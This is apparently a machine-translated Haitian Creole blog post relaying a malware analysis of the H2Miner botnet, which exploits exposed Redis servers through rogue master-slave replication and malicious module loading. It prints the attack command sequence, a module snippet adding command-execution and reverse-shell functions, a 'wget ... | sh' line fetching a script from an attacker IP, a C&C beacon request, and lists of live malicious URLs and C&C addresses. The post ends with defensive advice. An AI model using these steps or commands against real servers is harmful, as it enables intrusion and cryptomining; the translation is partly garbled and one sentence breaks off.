Yon jou de sa, youn nan serveurs pwojè mwen an te atake pa yon vè menm jan an. Nan rechèch nan yon repons a kesyon an "ki sa ki te?" Mwen te jwenn yon gwo atik pa Alibaba Cloud Security ekip la. Kòm mwen pa jwenn atik sa a sou Habré, mwen deside tradui l espesyalman pou ou <3
Antre
Dènyèman, ekip sekirite Alibaba Cloud la dekouvri yon epidemi toudenkou nan H2Miner. Kalite vè move sa a sèvi ak mank de otorizasyon oswa modpas fèb pou Redis kòm pòtay nan sistèm ou yo, apre sa li senkronize pwòp modil move li yo ak esklav la atravè senkronizasyon mèt-esklav epi finalman telechaje modil move sa a nan machin ki atake a epi li egzekite move modil. enstriksyon yo.
Nan tan lontan an, atak sou sistèm ou yo te fèt prensipalman lè l sèvi avèk yon metòd ki enplike travay pwograme oswa kle SSH ki te ekri sou machin ou apre atakè a te konekte nan Redis. Erezman, metòd sa a pa ka itilize souvan akòz pwoblèm ak kontwòl pèmisyon oswa akòz diferan vèsyon sistèm. Sepandan, metòd sa a pou chaje yon modil move ka dirèkteman egzekite kòmand atakè a oswa jwenn aksè nan koki a, ki se danjere pou sistèm ou an.
Akòz gwo kantite serveurs Redis ki anime sou entènèt la (prèske 1 milyon), ekip sekirite Alibaba Cloud a, kòm yon rapèl zanmitay, rekòmande pou itilizatè yo pa pataje Redis sou entènèt epi tcheke regilyèman fòs modpas yo epi si yo konpwomèt. seleksyon rapid.
H2Miner
H2Miner se yon botne min pou sistèm ki baze sou Linux ki ka anvayi sistèm ou a nan yon varyete fason, ki gen ladan mank otorizasyon nan Hadoop fil, Docker, ak vilnerabilite Redis ekzekisyon lòd remote (RCE). Yon botne travay pa telechaje scripts move ak malveyan pou min done ou yo, elaji atak la orizontal, epi kenbe kominikasyon lòd ak kontwòl (C&C).
Redis RCE
Pavel Toporkov te pataje konesans sou sijè sa a nan ZeroNights 2018. Apre vèsyon 4.0, Redis sipòte yon karakteristik loading plug-in ki bay itilizatè yo kapasite pou yo chaje pou dosye konpile ak C nan Redis pou egzekite kòmandman Redis espesifik. Fonksyon sa a, byenke itil, gen yon vilnerabilite kote, nan mòd mèt-esklav, dosye yo ka senkronize ak esklav la atravè mòd fullresync. Sa a ka itilize pa yon atakè yo transfere move so dosye. Apre transfè a fini, atakè yo chaje modil la sou egzanp Redis atak la epi egzekite nenpòt kòmand.
Malveyan analiz vè k'ap manje kadav
Dènyèman, ekip sekirite Alibaba Cloud la te dekouvri ke gwosè gwoup minè move H2Miner te ogmante toudenkou dramatikman. Dapre analiz la, pwosesis jeneral la nan ensidan atak se jan sa a:
H2Miner itilize RCE Redis pou yon atak konplè. Atakè yo premye atake sèvè Redis san pwoteksyon oswa sèvè ki gen modpas fèb.
Lè sa a, yo sèvi ak lòd la config set dbfilename red2.so
pou chanje non fichye a. Apre sa, atakè yo egzekite lòd la slaveof
pou mete adrès lame replikasyon mèt-esklav la.
Lè egzanp Redis atake a etabli yon koneksyon mèt-esklav ak move Redis ki posede pa atakè a, atakè a voye modil ki enfekte a lè l sèvi avèk lòd fullresync pou senkronize dosye yo. Lè sa a, dosye a red2.so pral telechaje nan machin nan atake. Lè sa a, atakè yo sèvi ak modil la chaje ./red2.so pou chaje dosye sa a. Modil la ka egzekite kòmandman ki soti nan yon atakè oswa inisye yon koneksyon ranvèse (backdoor) jwenn aksè nan machin nan atake.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Apre egzekite yon lòd move tankou / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1
, atakè a pral reset non dosye backup la epi dechaje modil sistèm lan pou netwaye tras yo. Sepandan, dosye a red2.so ap toujou rete sou machin atake a. Itilizatè yo konseye yo peye atansyon sou prezans nan yon dosye sispèk nan katab la nan egzanp Redis yo.
Anplis de sa nan touye kèk pwosesis move pou vòlè resous, atakè a te swiv yon script move pa telechaje ak egzekite dosye binè move pou
Dapre rezilta yo jeni ranvèse, malveyan an sitou fè fonksyon sa yo:
- Téléchargement fichiers Et egzekite yo
- Mining
- Kenbe kominikasyon C&C ak egzekite kòmand atakè yo
Sèvi ak masscan pou eskanè ekstèn pou elaji enfliyans ou. Anplis de sa, adrès IP sèvè C&C a difisil-kode nan pwogram nan, epi lame atak la pral kominike avèk sèvè kominikasyon C&C la lè l sèvi avèk demann HTTP, kote enfòmasyon zonbi (sèvè konpwomèt) yo idantifye nan header HTTP a.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Lòt metòd atak
Adrès ak lyen itilize pa vè k'ap manje kadav la
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Ide
Premyèman, Redis pa ta dwe aksesib sou entènèt la epi yo ta dwe pwoteje ak yon modpas solid. Li enpòtan tou pou kliyan yo tcheke ke pa gen okenn dosye red2.so nan anyè Redis la e ke pa gen okenn "kinsing" nan non dosye/pwosesis la sou lame a.
Sous: www.habr.com